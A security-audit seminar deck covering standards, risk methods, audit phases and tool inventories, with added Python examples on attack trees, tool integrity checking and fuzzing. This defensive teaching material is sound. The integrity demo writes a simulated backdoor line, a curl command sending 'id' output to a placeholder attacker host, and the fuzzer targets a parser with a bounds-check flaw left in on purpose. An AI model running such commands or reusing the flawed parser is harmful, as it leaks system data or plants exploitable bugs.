Audit and Security Testing of Information Systems
Florent Autréau - [email protected] / [email protected]
7 May 2015
Séminaire Confiance Numérique
Objectives
● Introduction to the standards, methods and tools used to assess the security of an information system
● "Cookbook" / recipes to conduct a security audit
What is a Security Audit ? For what Purpose ?
Information Security Audit
● Audit:
– Risk assessment
– Assessment and evaluation of conformance with the security policy and a set of security rules
● Reference: a set of rules defining the organization, procedures and/or technology that ensure information security.
● ANSSI: www.ssi.gouv.fr
● CERT: www.cert.org
● NIST: csrc.nist.gov
● CNRS: www.sg.cnrs.fr/fsd
● ISACA: www.isaca.org
● ITIL: www.itil.co.uk
● ISF: www.securityforum.fr

| Identifier | Type | Source |
|---|---|---|
| EBIOS | Method | ANSSI |
| MEHARI | Method | CLUSIF |
| OCTAVE | Method | CERT |
| PSSI | Methodological guide | ANSSI |
| TDBSSI | Methodological guide | ANSSI |
| RMF | Methodological guide | NIST |
| SP800-60 | Methodological guide | NIST |
| ITIL | Best-practice guide | OGC – BSI |
| COBIT | Best-practice guide | ISACA |
| ITSEC | Requirements standard | EU – ANSSI |
| ISO 15408 | Requirements standard | ISO |
| NF Z 42-013 | Requirements standard | AFNOR |
| ISO 2700x | Best-practice standard | ISO |
| PP nc / 0XX | Technical guide | ANSSI |
| SP800-45 | Technical guide | NIST |
Antoine Rojat / Florent Autréau
Standards for ISMS (Information Security Management System)
Timeline shown on the slide: BS7799-1:2000 → ISO17799:2005 → ISO 27002 (2007); BS7799-2:2002 → ISO 27001:2005; BS7799-3:2005 → ISO 27005; further parts of the family published in 2008, 2009 and later.
Requirements:
● ISO 27001:2005 – ISMS requirements
● ISO 27006 – Requirements for ISMS certification bodies; guidelines for accreditation of certification bodies
Recommendations:
● ISO 27000 – Glossary
● ISO 27002 – Guidelines / good practices for IS management; base for the statement of applicability
● ISO 27003 – Guidelines to implement an ISMS; practical guidance for the CISO/CSO
● ISO 27004 – Measurement for ISMS; definition and lifecycle of metrics
● ISO 27005 – Risk management for information security; ISRM processes; annex: method for risk management
● ISO 27007 – Guidance for ISMS audit; annexes for ISMS auditing
● ISO 27008 – Guidance for auditors on information security controls
Why assess Information Security?
● Evaluate and validate security practices (controls, quality processes);
● Validate procedures to alert, react and handle incident or disaster;
● Detect “forgotten/ignored” stakes or weaknesses;
● Educate users, management, employees to Information Security and Risk Management.
The good questions
● What are the assets?
● What are the threats?
● What are the vulnerabilities?
● What could be the impact/cost?
● What are the strategies to handle the risk?
Risk Analysis - Terminology
• Threat:
• what you want to protect valuable assets from
• anything (man-made or act of nature) that has the potential to cause harm (a.k.a. menace)
• Vulnerability:
• failure or deviation of the information system
• weakness that could be used to endanger or cause harm to an informational asset
• Risk:
• when a threat exploits a vulnerability against a valuable asset
• probability that an event will happen with a negative impact on an informational asset
ISO 27005 – Risk Analysis (diagram on the slide; text recovered from it)
Asset layers, top to bottom: business assets; informational assets (information, activities); IT services / applications (applications, services); infrastructure (PCs, DB servers, servers, data center).
Process steps: identification of threats; mapping of existing measures; identification of vulnerabilities; definition of evaluation criteria; definition of acceptance criteria; identification of risk scenarios; evaluation of risk scenarios; classification of security issues; classification of risk scenarios by impact and potentiality.
The evaluation grid plots each scenario (RSK-01 … RSK-10) on a 4×4 probability × impact matrix; scenarios above the acceptance criteria are the ones to treat.
MEHARI
● MEthode Harmonisée d'Analyse de RIsques (MEHARI) - Commission Méthodes du CLUSIF (CLUb de la Sécurité de l'Information Français)
● 6 risk factors: 3 for potentiality and 3 for impact;
● 6 types of security measures: structural, dissuasive, preventive, protection, palliative and recovery.
MEHARI risk model (diagram on the slide, translated)
Assets are the target of a potential threat, which materialises as an aggression, which triggers a deterioration, which causes damage, which results in losses.
Causes side: potentiality. Consequences side: impact. Together they give the gravity of the scenario; the stakes (enjeux) are what is exposed.
Security measures, each acting on one stage of the chain: structural, dissuasive, preventive, protection, palliative, recovery. Their effectiveness is expressed as the quality of security services.
EBIOS
Risk Analysis
– ANSSI – version 3 (2010)
– 5 modules
– Consistent with ISO 27001
– French
OCTAVE Allegro
■ From CERT http://www.CERT.org/octave/osig.html
■ Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)
■ Self-directed approach
■ Requires broad knowledge of business and security processes
Conducting a Security Audit without wearing suit & tie
Phases of the Audit
● Preparation
● Documentation review
● Interviews, talks, visits
● Technical investigation, data collection
● Data analysis
● Synthesis and report writing
● Report presentation
● Planning corrective actions
InfoSec Audit (1)
● "White box" – audit in situ:
– Access to buildings, organization, data, processes, documentation and procedures;
– Access to people, with interviews of managers and people in charge of operations.
InfoSec Audit (2)
● "Black box":
– Partial knowledge of and/or access to the information system (organization, documents, procedures, sites, people);
– Reveal/spot weaknesses:
● e.g. penetration testing.
Who can perform an audit ?
● AUTHORIZED personnel
● System/network administrator, consultant, contractor
● Technical and business knowledge
● Excellent communication skills
● Certified (e.g. ISO Lead Auditor, PASSI)
● Trained and educated people
Limitations
● Based on interviews, i.e. declarations and claims that can be twisted (intentionally or not);
● Context and time dependent;
● A snapshot / point-in-time view.
Where to start ?
● Define the contract: daily job, mission, contract, order, ...
● Define the type of audit (host-based, network-based, 'white-box', 'black-box', penetration testing, …)
● Define perimeter and schedule
● List the people to be involved
How to perform an Audit?
● Define the type of audit, target, perimeter
● Prepare the tools
● Review policies and documentation
● Data collection
● Analysis and synthesis
● Writing the report
● Presentation
● Planning corrective actions
Collect information
● Collect information on the target:
● Documentation: policies, "chartes" (acceptable-use charters), etc.
● Interviews
● Research: Google, Whois, DNS, department of commerce, ...
Goal: identify systems, processes, applications, people and organizations, as well as documents
Cartography
● Detection of systems and services, cartography:
● Locating and visiting sites and buildings (if possible)
● Documentation
● Asset management or network management tools
● e.g. HP OpenView, Lan Manager, N-View
● Network topology: IP routing, SMTP, ...
● Detection of ports/services
● Identification of systems
Looking for Vulnerabilities
● Scan and exploitation of vulnerabilities:
● Physical (dumpster diving, wiring, access to resources)
● Network (filtering policies, equipment)
● Systems (patches, active services)
● Applications
● Web / app server,
● Database,
● Mail server,
● Directory,
● ...
● Take and secure a position
● Progress
● Move deeper and deeper
Attack/Fault Tree Analysis
FTA : Fault Tree Analysis
● Start with target or undesired event to study
● Identify possible attacks and conditions
● Construct and evaluate the attack/fault tree
– By breaking the goal down
– Specify frequency/probability/costs
● Risk mitigation / hazard control
Attack Tree ( start with root goal )
Attack Tree ( with more details )
Attack Tree ( with cost estimates )
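The three attack-tree slides are figures; the evaluation they describe (root goal, OR/AND decomposition, leaf cost estimates, cheapest path) is shown below in code. This is an added example, not material from the slides: the tree, the step names and every cost are constructed assumptions for illustration, not figures from a real engagement.

```python
"""Attack tree with cost estimates (added example, not from the original slides).

A node is either a leaf (one attacker step with an estimated cost) or an
AND/OR node over children. The cheapest attack is computed bottom-up:
OR = cheapest child, AND = sum of all children. feasible_attacks() lists
every distinct combination of steps an attacker with a given budget can afford.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Node:
    name: str
    op: Optional[str] = None                 # "AND", "OR", or None for a leaf
    cost: float = 0.0                        # cost estimate, used only for leaves
    children: List["Node"] = field(default_factory=list)


def cheapest_attack(node: Node) -> Tuple[float, List[str]]:
    """Return (minimum cost, leaf steps) needed to achieve `node`."""
    if node.op is None:
        return node.cost, [node.name]
    results = [cheapest_attack(c) for c in node.children]
    if node.op == "OR":
        return min(results, key=lambda r: r[0])          # any one child suffices
    if node.op == "AND":                                  # every child is needed
        return sum(r[0] for r in results), [s for r in results for s in r[1]]
    raise ValueError(f"unknown operator {node.op!r}")


def feasible_attacks(node: Node, budget: float) -> List[Tuple[float, List[str]]]:
    """Every distinct attack (cost, steps) whose total cost is within `budget`."""
    if node.op is None:
        return [(node.cost, [node.name])] if node.cost <= budget else []
    if node.op == "OR":
        out: List[Tuple[float, List[str]]] = []
        for c in node.children:
            out.extend(feasible_attacks(c, budget))
        return out
    # AND: combine one feasible attack per child, pruning combinations over budget
    combos: List[Tuple[float, List[str]]] = [(0.0, [])]
    for c in node.children:
        child_attacks = feasible_attacks(c, budget)
        combos = [(cost + cc, steps + cs)
                  for cost, steps in combos
                  for cc, cs in child_attacks
                  if cost + cc <= budget]
    return combos


# Constructed tree; names and costs (in euros) are assumptions for the example.
TREE = Node("Read confidential customer file", "OR", children=[
    Node("Exploit unpatched service on the file server", cost=2000),
    Node("Use stolen credentials", "AND", children=[
        Node("Obtain a valid account", "OR", children=[
            Node("Phish an employee", cost=500),
            Node("Bribe an administrator", cost=20000),
            Node("Guess a weak password", cost=100),
        ]),
        Node("Connect through the exposed VPN", cost=300),
    ]),
    Node("Physical access", "AND", children=[
        Node("Enter the building", cost=1000),
        Node("Take a backup tape", cost=400),
    ]),
])

if __name__ == "__main__":
    cost, steps = cheapest_attack(TREE)
    print(f"cheapest attack: {cost} via {' + '.join(steps)}")
    for c, s in sorted(feasible_attacks(TREE, 1500)):
        print(f"  affordable with 1500: {c} via {' + '.join(s)}")
```

The cheapest path (weak password plus exposed VPN) is where a countermeasure pays off most: raising the cost of either leaf above the next-cheapest combination changes the attacker's best option, which is the comparison the cost-annotated tree on the slide is meant to support.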
The Toolbox
... with a strategy
Mehari – Interview Guidelines
Prepare the Tools
● A safe, trusted and self-contained platform for running the tools and storing the resulting data:
● Dedicated laptop
● USB or CD-based bootable system (such as Kali), VM
● Retrieve, install and configure the necessary tools.
● Possibly some development.
● Get familiar with the tools and trained on them.
● Verify that ALL tools used are untampered with.
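One concrete way to do the last check, as an added example that is not from the slides: record a SHA-256 manifest of the toolbox on a trusted machine, then compare the audit platform against it before each engagement. The files, the wrapper scripts and the "backdoor" line below are all constructed in a temporary directory purely to demonstrate the detection.

```python
"""Toolbox integrity check against a SHA-256 manifest (added example).

build_manifest() is run once on a trusted machine; verify_manifest() is run on
the audit platform. Three kinds of tampering are reported: a modified tool,
a missing tool, and an unexpected extra file.
"""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str, chunk: int = 1 << 16) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every regular file under `root` (relative, '/'-separated) to its digest."""
    manifest: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_manifest(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the tree under `root` with `manifest`; all lists empty means intact."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a small toolbox, then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        for tool in ("nmap", "amap"):
            with open(os.path.join(root, "bin", tool), "wb") as f:
                f.write(b"#!/bin/sh\nexec /usr/bin/" + tool.encode() + b' "$@"\n')
        manifest = build_manifest(root)              # taken on the trusted machine
        # Simulated tampering: a line appended to one wrapper, one tool deleted,
        # one unknown binary dropped in (attacker.invalid is a placeholder name).
        with open(os.path.join(root, "bin", "nmap"), "ab") as f:
            f.write(b"curl http://attacker.invalid/$(id) >/dev/null 2>&1\n")
        os.remove(os.path.join(root, "bin", "amap"))
        with open(os.path.join(root, "bin", "extra"), "wb") as f:
            f.write(b"\x7fELF")
        return verify_manifest(root, manifest)


if __name__ == "__main__":
    print(demo())
```

The manifest is only as trustworthy as where it is kept: store it (or a signature over it) off the audit platform, and remember that a hash check run from a compromised operating system proves nothing, which is the argument for the read-only boot medium listed above.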
Discovery Tools (1)
● Information: WhoIS, Dig, ...
● Topology
● IP: Traceroute, Itrace, Tctrace, ...
● SNMP: SNMPWalk
● SMB: LinNeighborood, NBTscan
● Network or system administration
● HP-Openview, N-View
● Services:
● Nmap, Amap
Discovery Tools (2)
● Wi-Fi: Kismet
● Bluetooth: BTScanner
Network Flow Analysis
● Wireshark
● Etherape
● Ntop
Testing Configuration
● HIDS – Host-based intrusion detection
– MSAT – Microsoft Security Assessment Tool
– Sara (Unix)
– JASS (Solaris Security Toolkit)
– Bastille
– Checkperms
– Utilities from sysinternals.com
Vulnerability Scanners
● Frameworks:
– Nessus/OpenVAS, Nexpose
– Nikto, Wikto, W3af, Wapiti
– BlueSnarf
– Metasploit
● Sending virus samples
● Code injection, packet injection
● XSS (Cross-Site Scripting)
Fuzzer
Testing based on random generation of data (either properly formatted and syntactically correct, or not)
● Fusil
● Sulley
● Defensics (Codenomicon)
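To make the idea concrete, here is a minimal mutation fuzzer, added as an example and not taken from the slides or from any of the tools listed. The target is a constructed type-length-value parser with a deliberate defect (it trusts the declared length); its hardened twin rejects bad input with a controlled error. Starting from one valid message, the fuzzer applies random byte flips, boundary values, truncation and insertions, and records every uncaught exception type.

```python
"""Mutation fuzzer against a small TLV parser (added example, constructed target)."""
import random
from typing import Callable, Dict, List, Tuple

Record = Tuple[int, bytes]


def parse_tlv_unsafe(buf: bytes) -> List[Record]:
    """Parse <type:1><len:1><value:len>* records. Defect: no bounds check on len."""
    records, i = [], 0
    while i < len(buf):
        rtype, length = buf[i], buf[i + 1]                       # may read past the end
        value = bytes(buf[i + 2 + j] for j in range(length))     # may read past the end
        records.append((rtype, value))
        i += 2 + length
    return records


class TLVError(ValueError):
    """Controlled rejection of malformed input."""


def parse_tlv_safe(buf: bytes) -> List[Record]:
    """Same format, with every declared length checked against what is available."""
    records, i = [], 0
    while i < len(buf):
        if i + 2 > len(buf):
            raise TLVError(f"truncated header at offset {i}")
        rtype, length = buf[i], buf[i + 1]
        end = i + 2 + length
        if end > len(buf):
            raise TLVError(f"record at offset {i} declares {length} bytes, "
                           f"{len(buf) - i - 2} available")
        records.append((rtype, buf[i + 2:end]))
        i = end
    return records


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random mutation: bit flip, boundary byte, truncation or insertion."""
    b = bytearray(data)
    choice = rng.randrange(4)
    if choice == 0 and b:
        pos = rng.randrange(len(b))
        b[pos] ^= 1 << rng.randrange(8)
    elif choice == 1 and b:
        pos = rng.randrange(len(b))
        b[pos] = rng.choice([0x00, 0x7F, 0x80, 0xFF])
    elif choice == 2 and len(b) > 1:
        del b[rng.randrange(1, len(b)):]
    else:
        pos = rng.randrange(len(b) + 1)
        b[pos:pos] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 4)))
    return bytes(b)


def fuzz(parser: Callable[[bytes], List[Record]], seed_input: bytes,
         iterations: int = 2000, seed: int = 1) -> Dict[str, bytes]:
    """Run `parser` on mutated inputs; map each uncaught exception type to the first input that raised it."""
    rng = random.Random(seed)                  # fixed seed: every finding is reproducible
    findings: Dict[str, bytes] = {}
    for _ in range(iterations):
        sample = mutate(seed_input, rng)
        try:
            parser(sample)
        except TLVError:
            continue                           # expected rejection, not a bug
        except Exception as exc:               # anything else is a finding
            findings.setdefault(type(exc).__name__, sample)
    return findings


# Constructed valid message: two records, (1, b"abc") and (2, b"xy").
SEED_MESSAGE = bytes([0x01, 0x03]) + b"abc" + bytes([0x02, 0x02]) + b"xy"

if __name__ == "__main__":
    for name, sample in fuzz(parse_tlv_unsafe, SEED_MESSAGE).items():
        print(f"unsafe parser: {name} on {sample!r}")
    print("safe parser findings:", fuzz(parse_tlv_safe, SEED_MESSAGE))
```

In Python the symptom is an `IndexError`; the same defect in a C parser would be an out-of-bounds read, which is why fuzzing native code is usually paired with a sanitizer or crash monitor rather than relying on the process to fail loudly on its own. Keeping the seed fixed turns each finding into a reproducible test case for the report.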
Using Firefox as a Security Tool
Testing based on the use of Firefox add-ons
● FireCAT – catalog of auditing tools
● FoxyProxy – advanced proxy management
● Firebug – edit/debug CSS, HTML, JavaScript
● Flashbug
● Firecookie
● Modify Headers
● XSS Me, RegEx Tester
OWASP Top 10 (2010) Tools
● A1: Injection – ZAP
● A2: Cross-Site Scripting (XSS) – BeEF
● A3: Broken Authentication and Session Management – HackBar
● A4: Insecure Direct Object References – Burp Suite
● A5: Cross-Site Request Forgery (CSRF) – Tamper Data
● A6: Security Misconfiguration – Watobo
● A7: Insecure Cryptographic Storage – N/A
● A8: Failure to Restrict URL Access – Nikto/Wikto
● A9: Insufficient Transport Layer Protection – Calomel
● A10: Unvalidated Redirects and Forwards – Watcher
Toolbox for analysis
● RATS
● Splint
● Flawfinder
● HP Fortify Static Code Analyzer
● Coverity SWAT
● Protocol Validation (formal or not)
– Avispa, ProVerif, Scyther
More detailed information on www.dwheeler.com
But also
● Code reading
● Design analysis
● Protocol validation (formal or not)
● Social-Engineer Toolkit ...
Restitution (reporting back)
Report
● Analysis and synthesis in the report
● Deliverable of the audit
● Readable and adapted to the audience
● From executive summary to detailed annexes
● Adapted to the business objectives
● Definition of an action plan
Audience
● Executives
● Stockholders
● Managers
● Operational staff
● Technical staff (techno-geeks)
Content
● Title, introduction, legal notices
● Executive summary
● Prioritized recommendations (with cost)
● Report (following the structure of the MEHARI domains)
● Conclusion and detailed recommendations
● Annexes
So What ?
● Definition of the corrective action plan; for each action:
● Who is the owner?
● Who is involved/concerned?
● When is it due?
● How much does it cost?
● Requires everyone's involvement
References - Recommended readings
● Risks Digest - Forum On Risks To The Public In Computers And Related Systems
http://catless.ncl.ac.uk/Risks
● 'Security Engineering, 2nd ed', Ross Anderson
http://www.cl.cam.ac.uk/~rja14/book.html
● OSSTMM - Open Source Security Testing Methodology Manual
http://www.isecom.org/osstmm/
Questions ?
Meet you in Grenoble on Nov 20th